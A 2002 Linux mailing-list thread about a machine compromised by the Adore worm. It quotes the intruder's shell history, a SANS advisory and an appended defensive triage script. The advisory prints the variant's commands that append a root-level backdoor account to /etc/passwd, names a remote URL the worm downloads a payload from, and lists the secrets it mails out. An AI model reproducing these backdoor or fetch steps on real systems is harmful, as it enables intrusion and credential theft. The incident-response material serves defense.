[CLUE-Tech] Lousy no-good @!$#%@#$% (cracked)
Sean LeBlanc
seanleblanc at attbi.com
Mon Jan 28 22:17:04 MST 2002
On 01-28 21:29, Randy Arabie wrote:
> On Mon, 28 Jan 2002, Sean LeBlanc wrote:
>
> > tar xzvf adore.tgz
> > cd adore
> > ./configure
> > make
> > ./configure
> > pico adore.h
> > ls -a
> > ./startadore
>
> The adore worm....perhaps? The info below is from:
>
> http://www.sans.org/y2k/adore.htm
It looks like some of the symptoms - although the adorefind says nothing was
there. My ps has a new time stamp on it - where can I find the tarball for
this? I was trying to find suspect processes by hand in the /proc dir, but
that's getting tedious. I also found a /usr/lib/locale/ro_RO that has some
schtuff in it that I just blasted.
>
> <SNIP>
>
> Global Incident Analysis Center
>
> Adore Worm
> Version 0.8 - April 12, 2001
>
> William Stearns of Dartmouth's ISTS has written a script Adorefind to
> detect the Adore worm. Questions concerning this page or the Adorefind
> tool should be directed to handler at incidents.org.
>
> This note is a preliminary characterization of the Adore worm. The
> worm code can be modified by anyone at any time. We'll try to keep
> this page updated as we learn more.
>
> Description
>
> Adore is a worm that we originally called the Red Worm. It is similar
> to the Ramen and Lion worms. Adore scans the Internet checking Linux
> hosts to determine whether they are vulnerable to any of the following
> well-known exploits: LPRng, rpc-statd, wu-ftpd and BIND. LPRng is
> installed by default on Red Hat 7.0 systems. From the reports so far,
> Adore appears to have started its spread on April 1.
>
> Adore worm replaces only one system binary (ps), with a trojaned
> version and moves the original to /usr/bin/adore. It installs the
> files in /usr/lib/lib . It then sends an email to the following
> addresses: adore9000 at 21cn.com, adore9000 at sina.com, adore9001 at 21cn.com,
> adore9001 at sina.com
> Attempts have been made to get these addresses taken offline, but no
> response so far from the provider. It attempts to send the following
> information:
> * /etc/ftpusers
> * ifconfig
> * ps -aux (using the original binary in /usr/bin/adore)
> * /root/.bash_history
> * /etc/hosts
> * /etc/shadow
>
> Adore then runs a package called icmp. With the options provided with
> the tarball, it by default sets the port to listen to, and the packet
> length to watch for. When it sees this information it then sets a
> rootshell to allow connections. It also sets up a cronjob in cron
> daily (which runs at 04:02 am local time) to run and remove all traces
> of its existence and then reboots your system. However, it does not
> remove the backdoor.
>
> Variant
>
> There appears to be a new variant of the adore worm circulating about
> the internet. Adorefind 0.2.4 now finds this variant. Only changes
> from the original adore worm have been noted below:
> * Adore.V.02
>
> * Butcher.gz
> * Adds 2 users to passwd file
> * echo "dead:x:1:1:anarchee:/:/bin/sh" >> /etc/passwd;
> * echo "h:x:0:0:admin:/:/bin/sh" >> /etc/passwd;
> * It installs itself in /dev/.shit
> * http://www.geocities.com/butcherdvs/butcher.tgz
> >/dev/.shit/red.tgz;
> * Sends email to the following 2 addresses: dvsowned at gmx.net,
> dvsowned at hotmail.com
> * Unless you have GLIBC_2.1.3 installed, part of this worm does not
> work
> * Uses a program called Sock to try to setup another backdoor, and
> calls /bin/login to allow for a root shell
>
> Detection
>
> Dartmouth's ISTS has developed a utility called adorefind that will
> detect the adore files on an infected system. Simply download it,
> uncompress it, and run adorefind. It will list which of the suspect
> files is on the system.
>
> Download Adorefind Here from Dartmouth's ISTS site.
>
> Snort already detects most of these signatures:
>
> Removal
>
> As adorefind runs, it will give you the option to stop the running
> worm jobs and remove the files from the filesystem.
>
> Protection
>
> You can take the document that Chris Brenton created for the Lion
> worm, and modify it to look for the Adore worm. You can read it here.
> You should also block for outbound emails to the 4 email addresses and
> block the website address go.163.com
>
> Analysis
>
> For an analysis of the adore package download this file:
> http://www.sans.org/y2k/practical/Michael_Reiter_GCIH.zip. Please note
> that this is an analysis done on the Adore rootkit which is a Loadable
> Kernel Module (LKM) and is not specifically analysis done on the
> red.tar adore worm.
>
> References
>
> Further information can be found at:
> * http://www.sans.org/current.htm
> * http://www.cert.org/advisories/CA-2001-02.html, CERT Advisory
> CA-2001-02, Multiple Vulnerabilities in BIND
> * http://www.kb.cert.org/vuls/id/196945 ISC BIND 8 contains buffer
> overflow in transaction signature (TSIG) handling code
> * http://www.sans.org/y2k/ramen.htm Information about the Ramen
> worm.
> * http://www.sans.org/y2k/DDoS.htm DDoS handling steps
> * http://www.isc.org/products/BIND/bind-security.html Web site for
> the creators of BIND
>
> The following vendor update pages may help you in fixing the original
> BIND vulnerability:
>
> Vendor - Description - URL
> Redhat Linux - RHSA-2001:007-03 - BIND remote exploit
> http://www.redhat.com/support/errata/RHSA-2001-007.html
> RHSA-2000-065-06 - LPRng exploit
> http://www.redhat.com/support/errata/RHSA-2000-065-06.html
> RHSA-2000-039-02 - wuftpd remote exploit
> http://www.redhat.com/support/errata/RHSA-2000-039-02.html
> RHSA-2000-039-02 - Rpc statd exploit
> http://www.redhat.com/support/errata/RHSA-2000-043-03.html
> Debian GNU/Linux - DSA-026-1 BIND
> http://www.debian.org/security/2001/dsa-026
> SuSE Linux - SuSE-SA:2001:03 - BIND 8 remote root compromise.
> http://www.suse.com/de/support/security/2001_003_bind8_txt.txt
> Caldera Linux - CSSA-2001-008.0 BIND buffer overflow
> http://www.caldera.com/support/security/advisories/CSSA-2001-008.0.txt
> http://www.caldera.com/support/security/advisories/CSSA-2001-008.1.txt
> Slackware - (linuxsecurity.com advisory) 1/30/2001 : Slackware: 'bind'
> vulnerabilities
> http://www.linuxsecurity.com/advisories/slackware_advisory-1121.html
> Mandrake - MDKSA-2001:017 BIND vulnerabilities
> http://www.linuxmandrake.com/en/security/2001/MDKSA-2001-017.php3?dis=7.2
> TurboLinux - TLSA2001004-1 BIND vulnerabilities
> http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000034.html
> Immunix 6.2 and 7.0-beta - IMNX-2001-70-001-01 BIND vulnerabilities
> http://download.immunix.org/ImmunixOS/7.0-beta/updates/IMNX-2001-70-001-01
> Conectiva - CLSA-2001:377 BIND vulnerabilities
> http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000377
> Storm Linux - (see Debian)
>
> Frequently Asked Questions - FAQ's
>
> I'm running Unix-like Operating System X on Processor Y. Am I
> vulnerable to Adore?
>
> The only class of systems currently attacked by the sole known
> adore variant are Linux systems running on the x86 processor
> architecture. That said, the design allows for future variants to
> be released that attack some other Unix lookalike or some other
> processor type. At the very least, you should run adorefind to do a
> quick check. Also, no matter what your flavor of Unix or CPU type,
> you should be applying your vendor's patches!
>
> I'm running some version of Windows. Am I vulnerable?
>
> Almost certainly not. If that changes with some new worm release,
> we'll update this page with new information.
>
> Credits
>
> This security advisory was prepared by Matt Fearnow of the SANS
> Institute and William Stearns of the Dartmouth Institute for Security
> Technology Studies.
>
> The Adorefind utility was written by William Stearns. William is an
> Open-Source developer, enthusiast, and advocate from Vermont, USA. His
> day job at the Institute for Security Technology Studies at Dartmouth
> College pays him to work on network security and Linux projects.
>
> Also contributing efforts go to SANS GIAC contributors, Todd Clark
> from Copper Media, Greg Shipley of Neohapsis, Marion Bates of ISTS,
> and Alex Bates of ISTS.
>
> Mirrors
>
> This advisory page can be found at http://www.sans.org/y2k/adore.htm
> and http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/adorefind.htm
>
>
> © 2001 SANS Institute : Office 301.951.0102 : Registration
> 1.866.570.9927 : Web Contact scott at sans.org
> </SNIP>
> --
>
> Cheers!
>
> Randy
>
> ================================================================
> Randy Arabie
> GnuPG Key Info --
>
> Fingerprint: 7E25 DFA2 EF72 9551 9C6C 8AA6 6E8C A0F5 7E33 D981
> Key ID: 7C603AEF
> http://www.arabie.org/keys/rrarabie.gnupg
> ================================================================
>
> _______________________________________________
> CLUE-Tech mailing list
> CLUE-Tech at clue.denver.co.us
> http://clue.denver.co.us/mailman/listinfo/clue-tech
--
Sean LeBlanc:seanleblanc at attbi.com Yahoo:seanleblancathome
ICQ:138565743 MSN:seanleblancathome AIM:sleblancathome
We will not know unless we begin.
-Howard Zinn
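The checks Sean was doing by hand (walking /proc for processes a possibly trojaned ps won't show, and looking for the files the advisory names) can be scripted. The script below is an added example for this thread; it is not adorefind, not from the SANS advisory, and not from anyone on the list. It assumes a Linux box with /proc and a procps-style ps. The path list is built from the advisory (/usr/bin/adore, /usr/lib/lib, /dev/.shit) plus the /usr/lib/locale/ro_RO directory Sean reported; the account names "dead" and "h" are the ones the variant appends. The function names and the "live" argument are this example's own.

```shell
#!/bin/sh
# adore-triage.sh: added example, not the advisory's or adorefind's code.
# Assumes Linux (/proc) and a POSIX-style "ps -e -o pid=".

# Paths the SANS advisory ties to Adore and its variant, plus the directory
# reported in this thread (/usr/lib/locale/ro_RO). Adjust to what you see.
ADORE_PATHS="/usr/bin/adore /usr/lib/lib /dev/.shit /usr/lib/locale/ro_RO"

# hidden_pids PROC_PIDS PS_PIDS
# Prints every PID in PROC_PIDS (whitespace separated) that is missing from
# PS_PIDS. Kept separate from the live snapshot so it runs on captured lists.
# A PID /proc knows about but ps will not list is what a trojaned ps looks
# like; a kernel rootkit (the Adore LKM) also hides the /proc entry, and this
# comparison cannot see that.
hidden_pids() {
    for pid in $1; do
        found=0
        for seen in $2; do
            if [ "$pid" = "$seen" ]; then
                found=1
                break
            fi
        done
        [ "$found" -eq 0 ] && echo "$pid"
    done
    return 0
}

# live_hidden_pids
# Snapshots ps first, then /proc. Anything started between the two snapshots
# is a false positive, so run it twice and only chase PIDs that show up both
# times.
live_hidden_pids() {
    ps_pids=$(ps -e -o pid=)
    proc_pids=$(ls /proc | grep '^[0-9][0-9]*$')
    hidden_pids "$proc_pids" "$ps_pids"
}

# suspect_accounts PASSWD_FILE
# Prints the two accounts the variant appends ("dead" and "h") and any other
# UID-0 account that is not root.
suspect_accounts() {
    awk -F: '($3 == 0 && $1 != "root") || $1 == "dead" || $1 == "h" { print $1 }' "$1"
}

# worm_artifacts [ROOT]
# Prints each ADORE_PATHS entry that exists under ROOT (default: the live
# filesystem). ROOT lets you point it at a mounted image of the suspect disk.
worm_artifacts() {
    root=${1:-}
    for p in $ADORE_PATHS; do
        [ -e "$root$p" ] && echo "$p"
    done
    return 0
}

# recent_cron_daily [ROOT] [DAYS]
# Lists cron.daily entries modified in the last DAYS days (default 30). The
# advisory says the worm drops its 04:02 cleanup-and-reboot job there.
recent_cron_daily() {
    root=${1:-}
    days=${2:-30}
    [ -d "$root/etc/cron.daily" ] || return 0
    find "$root/etc/cron.daily" -type f -mtime "-$days"
}

# ps_binary_report
# Shows the ps binary's mtime and, on an RPM system, has rpm verify the
# owning package. The rpm database sits on the same compromised disk, so a
# clean result is weak evidence; a changed ps is strong evidence.
ps_binary_report() {
    ps_path=$(command -v ps)
    ls -l "$ps_path"
    if command -v rpm >/dev/null 2>&1; then
        rpm -V "$(rpm -qf "$ps_path")"
    fi
}

# Live checks run only as "sh adore-triage.sh live", so the functions can
# also be sourced and pointed at captured data or a mounted image.
if [ "${1:-}" = "live" ]; then
    echo "== PIDs in /proc that ps does not report"; live_hidden_pids
    echo "== suspect accounts in /etc/passwd";       suspect_accounts /etc/passwd
    echo "== known Adore paths present";             worm_artifacts
    echo "== recently modified cron.daily entries";  recent_cron_daily
    echo "== ps binary";                             ps_binary_report
fi
```

Run it from a known-good shell and, if at all possible, with binaries copied from clean media: everything here goes through the box's own ps, ls, awk and find, and the advisory says ps is exactly what the worm replaces. Treat a hit from any one check as reason to pull the disk and image it rather than to keep cleaning by hand.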